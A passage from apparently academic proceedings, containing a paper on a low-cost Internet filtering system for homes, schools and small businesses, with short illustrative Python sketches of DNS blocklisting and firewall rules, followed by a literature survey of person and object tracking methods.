4. Esmaeili, M., Ebrahimi, H., Sameni, M.K.: Experimental and numerical investigation of the dynamic behavior of ballasted track containing ballast mixed with TDA. Proc. Inst. Mech. Eng. Part F: J. Rail Rapid Transit. 232, 297–314 (2018). https://doi.org/10.1177/0954409716664937
5. Sysyn, M., Nabochenko, O., Kovalchuk, V.: Experimental investigation of the dynamic behavior of railway track with sleeper voids. Railw. Eng. Sci. 28(3), 290–304 (2020). https://doi.org/10.1007/s40534-020-00217-8
6. Grassie, S.L., Gregory, R.W., Harrison, D., Johnson, K.L.: The dynamic response of railway track to high frequency vertical excitation. J. Mech. Eng. Sci. 24, 77–90 (1982). https://doi.org/10.1243/JMES_JOUR_1982_024_016_02
7. Knothe, K., Wu, Y.: Receptance behaviour of railway track and subgrade. Arch. Appl. Mech. (Ingenieur Archiv) 68, 457–470 (1998). https://doi.org/10.1007/s004190050179
8. Wu, T.X., Thompson, D.J.: A double Timoshenko beam model for vertical vibration analysis of railway track at high frequencies. J. Sound Vib. 224, 329–348 (1999). https://doi.org/10.1006/jsvi.1999.2171
9. Li, Z.G., Wu, T.X.: Modelling and analysis of force transmission in floating-slab track for railways. Proc. Inst. Mech. Eng. Part F: J. Rail Rapid Transit. 222, 45–57 (2008). https://doi.org/10.1243/09544097JRRT145
10. Mazilu, T.: Predicting the dynamic response of slab track with continuous slabs under moving load. Presented at the 11th International Conference on Sustainability in Science Engineering, WSEAS Transactions, Timisoara, Romania (2009)
11. Otero, J., Martínez, J., de los Santos, M.A., Cardona, S.: A mathematical model to study railway track dynamics for the prediction of vibration levels generated by rail vehicles. Proc. Inst. Mech. Eng. Part F: J. Rail Rapid Transit. 226, 62–71 (2012). https://doi.org/10.1177/0954409711406837
12. Liu, L., Shao, W.: Design and dynamic response analysis of rail with constrained damped dynamic vibration absorber. Procedia Eng. 15, 4983–4987 (2011). https://doi.org/10.1016/j.proeng.2011.08.926
13. Shahraki, M., Warnakulasooriya, C., Witt, K.J.: Numerical study of transition zone between ballasted and ballastless railway track. Transp. Geotechnics 3, 58–67 (2015). https://doi.org/10.1016/j.trgeo.2015.05.001
14. Zougari, A., Martínez, J., Cardona, S.: Numerical models of railway tracks for obtaining frequency response: comparison with analytical results and experimental measurements. ISSN. 18, 11 (2016)
15. Zougari, A.: Estudio del comportamiento vibratorio de vías ferroviarias mediante simulación numérica (2018)

A Lightweight, Multi-layered Internet Filtering System Ali Sadiqui(B) and Filali Moulay Rachid CF Meknes, OFPPT Laboratoire, Meknes, Morocco [email protected]

Abstract. The Internet has become an indispensable tool for everyone. Among other things, it serves as an encyclopedia at your fingertips and without limits of time and place. However, it is also a ruthless universe that has the potential to become a real threat to the most vulnerable of humanity. Hence the demand for filtering from parents, education managers and small entrepreneurs, anxious to protect their users from the multiple sources of distraction to which the web lends itself well. Although several Internet filtering tools are available on the market, their deployments and configurations require fairly in-depth knowledge of the field, which most often makes their integration complicated or even inefficient. In this article, we will outline an experiment we have conducted in this area, which proposes solutions to overcome the problems that may be due to the absence or ineffectiveness of filtering. Indeed, we have been able to develop an efficient and easy-to-handle Internet filtering system. This system is able to provide both protection and monitoring of usage time during deployment, whether at home, in educational settings, or on restricted networks. Keywords: Lightweight firewall · Internet filtering · Web filtering · Wi-Fi filtering · Parental controls

1 Introduction
Internet filtering means any technique for blocking or limiting access to content disseminated on the Internet that is considered inappropriate or unnecessary. With this in mind, we define a lightweight filtering system as any system that can perform the aforementioned task for an audience whose computer knowledge is quite limited. Unlike large structures, where the presence of firewalls is a necessity and where their configuration is entrusted to professionals specialized in this field, a lightweight Internet filtering system remains an ideal protection intermediary in other, less demanding contexts. Indeed, this type of system includes tools that can be used in various environments and for various purposes, namely parental control and limiting access to certain sites that do not relate to professional activity. This is also the case for the control carried out by schools or universities to prohibit access to sensitive sites deemed undesirable or inappropriate, etc. (see Table 1).


To meet the above objectives, we have worked on the development and deployment of ad hoc lightweight Internet filtering equipment to secure and manage networks intended for a variety of audiences. This equipment applies Internet filtering techniques automatically and transparently, sparing the user any intervention. Access to its configuration and filtering features is via a web interface or a mobile application, for ease of use.

Table 1. Examples of environments that can integrate a lightweight web filtering system.

Scope of application | Example of a target population | Some expected goals of web filtering
Home Wi-Fi network | Families concerned about parental control | Ban adult sites; set a time limit on one or several Internet activities; protect the home network from dangers emanating from the Internet
Network in educational spaces | Schools, universities, educational associations, libraries, etc. | Create a whitelist and/or blacklist of sites, services or applications accessible on the Internet
Network of SMEs that lack the financial and human resources to deploy a dedicated firewall | Fiduciaries, travel agencies, design offices, insurance companies, etc. | Create a whitelist and/or blacklist of sites, services or applications accessible on the Internet
Network in entertainment spaces | Cafes, restaurants, playgrounds, swimming pools, etc. | Create a whitelist and/or blacklist of sites, services or applications accessible on the Internet
Service provider networks | Internet providers | Offer this functionality to their customers in their Internet connection equipment
Industrial networks | IoT: access control, surveillance cameras, industrial machines, etc. | Enable or disable the Internet on the object; enable or disable a service, protocol, port, etc.

In this paper, we begin by briefly presenting the different methods of Internet filtering and justifying the choice we have made with respect to our problem, in order to better situate our discussion. In the second part, we develop the adopted solution and dwell on some characteristics of the proposed system before concluding.


2 Internet Filtering Methods

A firewall is a hardware or software network security element that controls inbound and outbound traffic according to a set of predefined rules. It is a real barrier between a trusted network and other networks considered less reliable. Different types of firewalls incorporate software, hardware, or a combination of both. We distinguish several types of firewalls, namely stateful firewalls, NAT firewalls, proxy firewalls and dynamic inspection firewalls, among others. All of them have different uses, strengths and weaknesses. To ensure Internet filtering, a firewall must rely on a well-defined blocking method. In the following, we introduce the methods of Internet filtering most often used:

• DNS server-based filtering: This prevents access to domains that do not correspond to pre-established rules. This process is quite simple to implement because it is enough to replace the DNS settings preconfigured, usually by the Internet provider, with the IP address of one of the DNS servers, free or paid, intended for this task. However, this process can be bypassed when a knowledgeable user manually configures their DNS or sets up a VPN tunnel.

• Filtering based on network protocols: This prevents access to certain services or sites according to the destination IP address, the destination port or the protocol used. This process is effective in some cases. However, it requires knowing all the IP addresses of the servers or the ports used by certain services to succeed. In addition, blocking certain IPs, protocols or ports may also block other services unintentionally.

• Client-side filtering: This type of filter is deployed as software on each device where filtering is required. This technique is effective in some cases, especially in home networks as a parental control tool, because it offers parents more features and flexibility: it allows them to control even games or software that do not require Internet access. However, it has the following disadvantages:
  • It is confronted with the resistance of children at certain ages, which is a source of inconvenience to parents.
  • It meets reluctance on the part of users due to security concerns, because installing third-party software on the target device increases the risk of intrusion through possible vulnerabilities of that software.
  • It can be very expensive when the number of devices to be controlled is very high.
  • It is difficult to apply in other environments where web filtering is required, such as educational spaces, libraries, universities, etc.

• Search engine filtering: Also called "SafeSearch", this is web filtering that uses a preconfigured search engine to exclude, during a web search, results deemed inappropriate for certain ages or audiences. Several search engines such as Google, Bing, or DuckDuckGo offer this option by indicating the IP address of a server to which search queries should be redirected. It should also be noted that web browsers integrate this option and can automatically redirect search queries to said servers when it is activated, which makes this filtering dependent on the installation and use of one of these browsers as well as the activation of this option.

• Layer 7-based filtering: This type of filtering is very advanced since it allows, without the use of other network parameters, identifying the source application or service from an analysis of the transmitted data, which facilitates flow control in a network. However, its integration into lightweight filtering systems is quite difficult to implement.
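To make the DNS-based approach concrete, the sketch below shows a minimal, illustrative domain-blocklist check of the kind such a filter performs before resolving a query. It is not the system described in this paper; the `BLOCKED_DOMAINS` set, the `is_blocked` helper and the example domains are hypothetical names chosen for illustration.

```python
# Minimal sketch of DNS-style blocklist filtering (illustrative only).
# A real DNS filter would intercept DNS queries and answer NXDOMAIN
# (or a block-page address) for matching names; here we only show the
# domain-matching logic that such a filter relies on.

BLOCKED_DOMAINS = {"ads.example", "adult-site.example"}  # hypothetical blocklist

def is_blocked(query_name: str) -> bool:
    """Return True if the queried name or any parent domain is blocklisted."""
    labels = query_name.rstrip(".").lower().split(".")
    # Check "www.ads.example", then "ads.example", and so on.
    for i in range(len(labels) - 1):
        candidate = ".".join(labels[i:])
        if candidate in BLOCKED_DOMAINS:
            return True
    return False

if __name__ == "__main__":
    for name in ("www.ads.example", "news.example.org"):
        action = "block (return NXDOMAIN)" if is_blocked(name) else "resolve normally"
        print(f"{name}: {action}")
```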

3 Problematic

In a home network or on restricted networks, it is rare to find a firewall dedicated to filtering management. As a result, those who want to manage web filtering face several difficulties, including the need for fairly in-depth knowledge of network protocols to apply the types of filtering mentioned above effectively. Adopting client-side Internet filtering still does not meet users' needs because of the disadvantages and limitations mentioned above.

4 Project Presentation

The filtering system is composed of three essential elements, namely the filtering equipment, cloud servers and a control application.

4.1 Filtering Equipment

The filtering equipment, in most cases in these types of networks, is a Wi-Fi router whose firmware is modified to incorporate new features. However, said equipment can also be any filtering device that supports secure remote access (SSH or other) and acts as a firewall. Communication with the filtering equipment follows a "Client/Cloud/Host" architecture (see Fig. 1), similar to that of an IoT device. This architecture has given us the following advantages:

• All the features of the filtering equipment are accessible to the user via a single protocol, in this case HTTPS;
• Enhanced security of the target filtering equipment, since it is configured to accept requests only from one or more well-identified cloud servers;
• The equipment takes advantage of this architecture so that its hardware configuration can remain quite modest (see Table 2).

The choice of router was constrained by several factors, including market availability, interface throughput and price; the latter must remain within reach of the majority of users. By adopting this architecture, our equipment combines a very low cost, enhanced security and fast processing.
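As an illustration of the Client/Cloud/Host idea, the sketch below shows how a cloud server might push a filtering rule to the equipment over its secure remote-access channel. It is only a sketch under assumed names: the router address, credentials and the firewall command are placeholders, and the use of the Paramiko SSH library is our choice for the example, not necessarily what the authors used.

```python
# Sketch: a cloud-side helper that pushes one filtering command to the
# equipment over SSH. Hypothetical host, credentials and command.
import paramiko

def push_rule(host: str, user: str, key_path: str, command: str) -> str:
    """Open an SSH session to the filtering equipment and run one command."""
    client = paramiko.SSHClient()
    client.set_missing_host_key_policy(paramiko.AutoAddPolicy())  # demo only
    client.connect(hostname=host, username=user, key_filename=key_path)
    try:
        _stdin, stdout, stderr = client.exec_command(command)
        return stdout.read().decode() + stderr.read().decode()
    finally:
        client.close()

if __name__ == "__main__":
    # Example: block outbound traffic to TCP port 21 (FTP) on the router.
    output = push_rule(
        host="192.0.2.10",            # placeholder equipment address
        user="admin",                 # placeholder account
        key_path="/path/to/key",      # placeholder SSH key
        command="iptables -A FORWARD -p tcp --dport 21 -j DROP",
    )
    print(output)
```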


Table 2. Comparison of communication between the host and the client in both architectures.

Criterion | Client/Server architecture | Client/Cloud/Host architecture
Minimum requirements on the host | Requires a considerable amount of RAM and flash memory | Does not require a large amount of RAM or flash memory
Services installed on the host | Several services must be installed on the host's system, including the web and VPN services in addition to the authentication service | No services are required to be installed on the host system
Updates to the app or any of the features | Often requires updates for all installed services on each host | Updates are only done on the cloud servers
Safety features | An attack protection system is required on the host | Protection against attacks is an integral part of the cloud
Host response time | Requests go through processing on the host before being sent to the cloud for a second processing | Processing goes directly to the cloud servers to be executed on the host

Fig. 1. Presentation of the architecture and filtering process of the equipment realized.


4.2 Servers on the Cloud

The solution is composed of several servers installed on the Cloud. These provide, among other things, user authentication, access policy management and remote control of the routers. The essential servers are:

• VPN connection servers, which ensure a secure tunnel between the equipment and the cloud servers to exchange data.
• DDNS synchronization servers, which update the public IP address of the filtering equipment to identify it on the Internet.
• Database servers of filtering methods, which identify the method to use to block a given content on the Internet. This database is an essential part of the project: it makes content filtering independent of the equipment's operating system and brings together several scripts developed to run on several platforms.
• Database servers of user options, which record the choices of each user.

4.3 The Mobile Control Application

Filtering is managed through a mobile application downloadable from the Internet. Each supervisor (a parent, a director, a network administrator, etc.) is asked to enter a login and password to access a private space. This space gives the supervisor the possibility to manage users and apply the filtering of their choice. Note that the application is designed to be accessible to anyone with only basic knowledge of computer interfaces (see Fig. 2). Indeed, as a simplification, the supervisor will often choose between only two options, "block" or "allow", for a service, an application, a game, etc. It is therefore up to the filtering system to choose the appropriate type of filtering to apply to enforce this choice. With this in mind, we propose an approach that makes it possible to deploy a lightweight Internet filtering system available to such users and that takes into account the constraints mentioned above. Indeed, this system can automatically determine the technique and parameters used to block access to a domain, a service, an application, or other elements on the Internet.
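A minimal sketch of the idea that the supervisor only chooses "block" or "allow" while the system picks the concrete technique is given below. The rule records, method names and the dispatch table are hypothetical; they only illustrate how a filtering database could map an item to a filtering method and its parameters.

```python
# Sketch: mapping a supervisor's "block X" choice to a concrete filtering
# method via a (hypothetical) filtering database.

# Hypothetical filtering database: item -> (method, parameters).
FILTERING_DB = {
    "adult-content":  ("dns",    {"domains": ["adult-site.example"]}),
    "ftp-downloads":  ("port",   {"protocol": "tcp", "port": 21}),
    "some-game-app":  ("script", {"script": "block_some_game.sh"}),
}

def build_action(item: str, decision: str) -> dict:
    """Translate a block/allow decision into a low-level filtering action."""
    method, params = FILTERING_DB[item]
    return {"item": item, "decision": decision, "method": method, "params": params}

if __name__ == "__main__":
    action = build_action("ftp-downloads", "block")
    # The equipment would then execute the matching script or firewall rule.
    print(action)
```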

5 The Filtering Process

On home, educational or restricted networks, we have divided the filtering needs into three types of essential elements: web pages, services and applications. Each element has a well-defined filtering module.


Fig. 2. Two examples of mobile app interfaces.

5.1 The Web Filtering Module

The web page filtering process is divided into two parts depending on the type of web page to be processed (see Fig. 4 and Fig. 5). If it is a "simple" web page, filtering is based on whether or not it belongs to the domains covered by the pre-established rules, set either by parental control or by the security policy of the establishment. However, if it is a web page that displays the result of a search engine and the "safe search" option is activated, filtering is delegated to the server dedicated to this type of processing; otherwise, the unfiltered results are displayed. Search engine-based filtering covers text, images and videos. The equipment relies on the filtering database to identify the settings to be enabled for the user on the cloud DNS servers in order to display the requested result. This type of filtering uses the DNS filtering method; however, it has been hardened to resist possible bypasses.

5.2 The Service Filtering Module

A service, in a home or restricted network environment, means any functionality that meets particular needs or performs well-specified tasks, and above all that can be identified by one or more fixed ports, such as:

• The download service using the FTP protocol or another: this service is, in some cases, seen as a risk to the availability of bandwidth.


• The service that provides access to an IoT object in the local network: this service can present security risks, so the activation of remote access ports must be controlled.
• The VPN server access service: establishing a VPN link by an unauthorized user can lead to the circumvention of some access rules.

The service filtering module relies on the filtering database to identify the ports to open or close for the user (see Fig. 4 and Fig. 5).

5.3 The Filtering Module of an Application

The filtering process of an application can have some peculiarities given the difficulty of identifying a common process to follow to ensure this task. Each application has its specificities and may require separate processing. The methods of blocking an application may also vary and evolve over time and must always be updated to ensure system reliability. The equipment in question uses the filtering database to identify the appropriate method to block an application by running a script pre-established for this purpose (see Fig. 4 and Fig. 5).
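To illustrate the port-based part of the service filtering module, the sketch below generates and applies a simple firewall rule for a fixed service port. The port numbers, chain name and the assumption that the equipment exposes iptables are ours for the example; the paper does not specify the exact commands its scripts run.

```python
# Sketch: blocking a service identified by a fixed port (illustrative).
# Assumes the filtering equipment runs Linux with iptables available.
import subprocess

SERVICE_PORTS = {"ftp": 21, "remote-iot-access": 8080}  # hypothetical mapping

def block_service(service: str) -> None:
    """Append a DROP rule for the service's TCP port on the FORWARD chain."""
    port = SERVICE_PORTS[service]
    cmd = ["iptables", "-A", "FORWARD", "-p", "tcp",
           "--dport", str(port), "-j", "DROP"]
    subprocess.run(cmd, check=True)

if __name__ == "__main__":
    block_service("ftp")  # e.g., stop FTP downloads from consuming bandwidth
```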

6 The Deployment of the Solution

Deploying the solution is very simple: it is enough to connect the Internet filtering equipment to the modem providing Internet connectivity, regardless of the type of connection used (ADSL, fiber optic, 4G or others), to obtain protection. In the case of a simple Wi-Fi network (family network, cafe, etc.) where the user's modem offers a Wi-Fi network, simply disable the latter to enjoy a protected Wi-Fi network. In the case of a wired architecture (school, university, association, etc.) where the elements are connected by network cables, our solution can be integrated by connecting the Internet filtering equipment to the institution's switch (see Fig. 3).

Fig. 3. Deploying the solution on a LAN.


Fig. 4. General filtering process


Fig. 5. The general filtering algorithm.



7 Conclusion

The equipment presented in this study is easy to use, convenient and intuitive. It has managed to significantly reduce the cost, time, and effort of carrying out Internet filtering, a task that has always been a matter for specialists. The equipment therefore offers parents protection for their children's browsing, teachers the possibility of sharing the Internet without hesitation, and entrepreneurs the means to limit access to sites or services deemed irrelevant to their work. Finally, it is noteworthy that the project has been deployed and tested by many people, several institutions, and SMEs, and has demonstrated its effectiveness and the satisfaction of its users. Nevertheless, we believe that an effort remains to be made, on the one hand to raise families' awareness of the dangers of the Internet, and on the other hand, on the administrative side, to urge education officials to protect educational spaces connected to the Internet.

Tracking Methods: Comprehensive Vision and Multiple Approaches

Anass Ariss1(B), Imane Ennejjai1, Nassim Kharmoum1,2, Wajih Rhalem3, Soumia Ziti1, and Mostafa Ezziyyani4

1 Department of Computer Science, Intelligent Processing Systems and Security Team, Faculty of Sciences, Mohammed V University in Rabat, Rabat, Morocco
[email protected]
2 National Center for Scientific and Technical Research (CNRST), Rabat, Morocco
3 E2SN Research Team, ENSAM Rabat, Mohammed V University in Rabat, Rabat, Morocco
4 Mathematics and Applications Laboratory, Faculty of Sciences and Techniques of Tangier, Abdelmalek Essaadi University, Tétouan, Morocco

Abstract. Tracking of human beings as well as objects is currently a great challenge. It aims to understand the fundamental principles of the detected objects and human beings in order to associate them with robust processing systems and draw the desired conclusions. Tracking generally uses several methods such as graph theory, technological tools, the Internet of Things (IoT), Big Data, and artificial intelligence, which maintain several hypotheses to help track objects or human beings. In this article, we review the tracking methods proposed in this direction and, finally, we analyze and discuss the various results obtained.

Keywords: Tracking · Graph Theory · Internet of Things (IoT) · Big Data · Artificial Intelligence

1 Introduction

Tracking systems have become a necessity for analyzing the dynamic processes of human beings as well as objects from their data. Since the detection and tracking of a large number of people is not feasible manually, several tracking methods have been suggested for these objectives by many groups of researchers; in this work we carry out an analytical study on the existing methods and evaluate the results of each one, although no method works best in all scenarios. A great deal of data in the world has been lost due to the absence of monitoring and control over the data generated by human or object activity, which makes tracking necessary. Multiple tracking of humans or objects handles irregular movements such as changes in appearance and detects abnormal behaviors of humans or objects until enough information is accumulated to make a decision [18]. A tracking system can be used to learn everything about an activity and make the most of the data [21].


Such a system can then be used to fight crime, as well as to deal with epidemics and other situations. The tracking of objects as well as humans in spaces with limited or unlimited dimensions requires robust methods that ensure accurate tracking and are also able to understand and analyze the activities of objects or humans to facilitate decision-making. Strong tracking of several objects or people through their data requires extraction and processing models specific enough to remove the ambiguity of the data. However, we also want models that are general and simple enough to allow robust tracking.

Numerous research efforts have been conducted in the field of multiple tracking of human beings as well as objects. Among these works, we can mention those that address this theme using graph theory [12,13], technological tools, the Internet of Things (IoT) [14], Big Data [16], and artificial intelligence [15], or using more than one technique to achieve better results. Our work covers all these categories of approaches. In this paper, we present an analytical study of existing tracking systems. It can be seen as complementary work charting another research path on this topic, as it provides a global view of the methods used in this field.

Part of our work is to study term extraction for word cloud generation from strongly labeled domains in articles that deal with the topic of tracking. We present a term extraction technique based on a word cloud, a data visualization method used for the presentation of textual data in which the size of each word indicates its frequency or importance; significant textual data points can also be highlighted using a word cloud. This technique reinforces the terms frequently used in the abstracts of published articles that deal with the tracking problem. As shown by the result in Fig. 1, the most common words in the existing works are: tracking, system, person, people, object, technology, graph, Big Data, IoT, artificial intelligence, etc. Our experiments in extracting terms from the abstracts of different articles show that each increase in the number of abstracts brings a considerable improvement in the quality of the word cloud. In addition, our results demonstrate the robustness of this approach compared to alternative cloud generation methods, which are highly sensitive to data scarcity.

The rest of this article is organized as follows. The second section elucidates tracking. In the third section, some related work is briefly reviewed. Analysis and discussion are presented in the fourth section. Finally, the fifth section presents the conclusion of our study and specifies our ongoing work.
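As a minimal illustration of the term-extraction step described above, the sketch below builds a word cloud from a small set of abstracts using the open-source `wordcloud` Python package; the sample abstracts and stop-word choices are placeholders, and the authors' actual extraction pipeline is not specified in the paper.

```python
# Sketch: building a word cloud from article abstracts (illustrative).
# Requires the third-party packages `wordcloud` and `matplotlib`.
from wordcloud import WordCloud, STOPWORDS
import matplotlib.pyplot as plt

abstracts = [  # placeholder abstracts standing in for the collected corpus
    "Online multi-person tracking with instance-aware representation learning.",
    "Tracking COVID-19 by tracking infectious trajectories with IoT and Big Data.",
    "Human body part labeling and tracking using graph matching theory.",
]

text = " ".join(abstracts).lower()
cloud = WordCloud(width=800, height=400,
                  stopwords=set(STOPWORDS),
                  background_color="white").generate(text)

plt.imshow(cloud, interpolation="bilinear")
plt.axis("off")
plt.show()
```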

2 Elucidation Tracking

The characterization of the tracking theme is broad, given the availability of numerous definitions: each group of researchers gives this theme a definition that corresponds to their specialization and field of activity. Among the commonly used definitions, a tracking system is described as a system used for the detection of moving persons or objects that provides location data for subsequent processing. We also


Fig. 1. The extraction of terms for word cloud in tracking articles.

note that a tracking system is a system used to monitor the data of people and moving objects; it is seen as an important tool for obtaining information about people or other targets of interest. Our team considers a tracking system to be a strategy for targeting objects or people, where the target is tracked through an analysis of its activities. After reviewing this body of work, we note that, so far, no author has designed a flexible tracking system. Having highlighted the different works done in this context, we note that tracking can be organized along three dimensions (Fig. 2); each dimension can have 1 to N forms of implementation at a time T, and these dimensions are bound together by two-way, non-exclusive relationships. The system also gives flexibility at the starting-point level, which means that tracking can start with any dimension, giving the system a degree of backward compatibility depending on the input. At the end of the data qualification, different implementations are made available; their role is to build a complete system in which the implementations can coexist.

3 Related Work

Research on tracking [1] is considered both important and complex: on the one hand, each proposed solution deals with the problem in a specific way; on the other hand, tracking systems are not supported by any standard.


Fig. 2. Tracking systems architecture.

This justifies the increase in research on this topic. To study it, we analyzed existing research as well as searches of the international Scopus database [38], which belongs to Elsevier, and obtained the result shown in Fig. 3: for the themes (Tracking, Tracking systems, Multiple tracking, Multi tracking, Tracking methods, Tracking method), research began in 1978, the number of articles submitted was negligible before the 2000s, and since 2002 there has been growing research activity in this field.

The work done so far does not use the same functionalities and does not provide solutions that can be considered general and transferable to several domains and situations: when one work treats the tracking problem in one sense, other works propose non-extendable solutions. Our study covers the different approaches to tracking and gives more clarification on the latest efforts made in this context.

Hefeng et al. [4] presented a new approach to online multi-person tracking based on deep learning [20] that focuses on learning instance-aware representations with a multi-branch neural network (MBN) [17]: while the basic subnet provides a deep image feature, instance sub-networks generate instance-level appearance discrimination to reduce ambiguities between the different targets and relieve the burden of a subsequent data association. Its objective is to use learning and instance-aware representation association for the online tracking of several people.


Fig. 3. Analysis of Scopus search results: tracking systems documents by year.

The article addresses detection problems: the work proposes a shift from the traditional detection-to-association paradigm by learning instance-aware representations of people, unlike existing methods that generally use generic (category-level) human detectors. The proposed approach aims to assign a specific tracker to each person in motion to reduce ambiguities in complex scenes, with instance-level object representations learned by deep neural networks. This leads the authors to an interesting result: the construction of an association matrix based on the outputs of the MBN network for a joint state inference of the targets, where a simple but effective solver is developed thanks to the powerful support of the MBN.

Janusz Wojtusiak and Reyhaneh Mogharab Nia [5] propose a model capable of predicting a person's location, both during their routine schedule and in case of loss, to address the problem of tracking people in general and especially people with Alzheimer's disease, who are at risk of wandering and getting lost outside their homes. This is achieved through a multi-step process that involves unsupervised and supervised learning [19,39]. The approach has many similarities to previous research but differs in many ways: a spatio-temporal clustering method is used to detect the normal locations where individuals typically stay, and the detected clusters are then passed to a supervised learning algorithm to build models that predict typical locations based on date and time as well as some characteristics derived from the geolocation data. These steps led to a method with an AUC of 78% for predicting locations according to the day, the time, and the extracted location and duration attributes.
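A minimal sketch of the two-stage idea attributed to [5], spatio-temporal clustering of GPS points followed by a supervised model that predicts the cluster from day and time, is given below using scikit-learn; the sample data, the DBSCAN parameters and the choice of a random forest are our assumptions, not the authors' exact pipeline.

```python
# Sketch: cluster GPS fixes into "usual places", then predict the place
# from day-of-week and hour (illustrative; toy data and parameters).
import numpy as np
from sklearn.cluster import DBSCAN
from sklearn.ensemble import RandomForestClassifier

rng = np.random.default_rng(0)
# Toy GPS fixes around two frequent locations (lat, lon) with timestamps.
home = rng.normal([34.020, -6.840], 0.0005, size=(60, 2))
shop = rng.normal([34.030, -6.830], 0.0005, size=(40, 2))
coords = np.vstack([home, shop])
day_of_week = rng.integers(0, 7, size=len(coords))
hour = np.concatenate([rng.integers(18, 23, 60), rng.integers(9, 13, 40)])

# Stage 1: unsupervised clustering of locations.
labels = DBSCAN(eps=0.002, min_samples=5).fit_predict(coords)

# Stage 2: supervised prediction of the cluster from temporal features.
features = np.column_stack([day_of_week, hour])
clf = RandomForestClassifier(n_estimators=100, random_state=0)
clf.fit(features, labels)

print("clusters found:", set(labels))
print("predicted place at Monday 10h:", clf.predict([[0, 10]])[0])
```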


Djamal Merad et al. [6] address the problem, in multiple object tracking, of the identity changes that occur between tracked targets due to occlusions and interactions between tracked objects, with the goal of understanding the purchasing behavior of customers by analyzing their movements in a densely populated commercial space. The approach proposed in this work focuses on solving the problem of identity changes caused by severe long-term occlusions by using the proposed method for the re-identification of people across non-overlapping cameras. The tracking strategy has two steps: the first uses a particle filter to retrieve the trajectory segments (tracklets) of the tracked individuals; the second uses the re-identification method to merge these tracklets and retrieve the global trajectories of the tracked people. The paper presents a tracking system based on the association of two modules, a tracking module and an association module, to retrieve the overall trajectories of the individuals followed in a single-camera tracking system. The tracking module, used to retrieve trajectory segments, is based on a dedicated particle filter for each tracked individual, while the association module, which is the most important part of this work, is used to obtain matches between the individuals coming from the tracking module. These matches are used to merge trajectory segments that belong to the same individual in order to find the overall trajectories of the people being tracked. The result of this work can thus be summarized in two modules: the tracking module, based on dedicated particle filters that retrieve the tracklets for each tracked individual, and the association module, used to merge these tracklets and retrieve the global trajectories of the tracked individuals.

Mouna Amrou M'hand et al. [7] proposed a tracking architecture for goods, to ensure the control and management of the various logistics operations. The main objective of this work is to contribute to the literature on RoRo (Roll-On/Roll-Off) terminals by finding solutions for the automation of supervision, control, and tracking of rolling goods. To this end, they contributed a new architecture designed around automatic identification technologies (barcodes, QR codes, and magnetic identity cards). It provides real-time tracking capability: a vehicle is followed in each area of the terminal via a portal that identifies it using a barcode, QR code, or magnetic identity card. The system performs process logic verification and reasoning and provides process knowledge support. The result of this approach is real-time vehicle tracking as well as decision support for logisticians.

Badreddine Benreguia et al. [8] proposed an important solution to help address the global coronavirus pandemic [2], in the form of an architecture to track asymptomatic patients, who are considered to be the main factor behind the rapid spread of the coronavirus and the main reason why governments lost control of this critical situation.


The goal of the system is not to track people but to track an extremely dangerous virus, by archiving the trajectories of people collected continuously using a Big Data architecture. This proposed model is powered by IoT devices that can determine people's contact information during their outdoor activities and send the collected data to the system; people who stay at home or in their vehicles are assumed to be isolated. All this gives the system the reliability needed to quickly identify all people suspected of being infected with the coronavirus, or to control other pandemics.

Javier Ruiz-del-Solar et al. [9] aim at robust tracking of people in real environments and in real time, and for this purpose they developed a computer vision system addressing this theme. The work relies on two main families of approaches: the first is feature-based (low-level analyses, active shape and model analysis), while the second is image-based (linear subspace methods, neural networks, and statistical approaches). Image-based approaches have shown better performance than feature-based approaches. The result provided in this article is a system consisting of three main subsystems. The first is dedicated to motion analysis; this motion analysis subsystem is based on background subtraction and selectively excludes moving visual objects and their shadows from the background model while retaining ghosts. The second focuses on color analysis; this color analysis subsystem uses a standard skin detector algorithm, which increases the performance of the entire system by reducing the search area for faces. The last one is face analysis, which is based mainly on the face detection system.

Nicolas Thome et al. [10] propose a solution to follow and interpret the movements of the human body robustly by correctly labeling its parts in video sequences. The proposed method differs from existing approaches, which are based either on motion, on a model, on appearance, or on features, and which all require people to be in a standing position. The article proposes a hybrid approach, dedicated to the localization and identification of the visible parts of the body in the image, independent of the point of view and the human pose. This proposal led the authors to an algorithm that proceeds as follows: a set of segments corresponding to the body parts to be identified is extracted from the image, then a graph encoding the shape of the silhouette is generated and compared to a 3D model of the human skeleton, so that each matched graph node is tracked over time.

Tracking COVID-19 cases in real time and predicting which participants are likely to have COVID-19 [3] is the goal of the article by Cristina Menni et al. [11]. To do this, they built a predictive model combining symptoms, applied it to data from all users of the app who reported symptoms, and predicted which participants are likely to have COVID-19. The article makes two main contributions. The first is that loss of smell and taste is a potential predictor of COVID-19 in addition to other more established symptoms, including high temperature and a new persistent cough.


The second contribution was the identification of a combination of symptoms, including anosmia, fatigue, persistent cough, and loss of appetite, which together could identify people with COVID-19.
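To make the symptom-combination idea concrete, the sketch below trains a logistic regression on binary symptom indicators to score the probability of infection. The toy data and feature names are invented for illustration; they do not reproduce the model or data of [11].

```python
# Sketch: predicting likely COVID-19 from a combination of reported
# symptoms with logistic regression (toy data, illustrative only).
import numpy as np
from sklearn.linear_model import LogisticRegression

# Columns: anosmia, fatigue, persistent cough, loss of appetite, fever.
X = np.array([
    [1, 1, 1, 1, 1],
    [1, 0, 1, 0, 1],
    [0, 1, 0, 0, 0],
    [0, 0, 0, 0, 0],
    [1, 1, 0, 1, 0],
    [0, 0, 1, 0, 1],
])
y = np.array([1, 1, 0, 0, 1, 0])  # 1 = tested positive (toy labels)

model = LogisticRegression().fit(X, y)
new_report = np.array([[1, 0, 1, 1, 0]])  # anosmia + cough + appetite loss
print("probability of infection:", model.predict_proba(new_report)[0, 1])
```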

4 Analysis and Discussion

In this section, we analyze and discuss the different approaches studied above. To do so, we focus on the classification of the following works (Hefeng et al. (2019); Janusz Wojtusiak and Reyhaneh Mogharab Nia (2019); Djamal Merad et al. (2019); Mouna Amrou M'hand et al. (2019); Badreddine Benreguia et al. (2020); Javier Ruiz-del-Solar et al. (2003); Nicolas Thome et al. (2016); Cristina Menni et al. (2020)) to derive our evaluation criteria. We organize these criteria according to the issues addressed and the solutions proposed, so as to discuss both and to assess the methodologies followed in each work.

After the analysis, we can divide the above works into two main categories: the first concerns tracking approaches for human beings, and the second concerns the tracking of objects (Fig. 2). These approaches can follow different characteristics: adopted in a space with a limited surface or in a space with large (unlimited) dimensions, in real time or not, using technological tools, IoT, graph theory, Big Data or artificial intelligence. Starting from the choice of tracking model, we can deduce from Table 1 that we can build a tracking system by merging the strong points of each of the works [4-11].

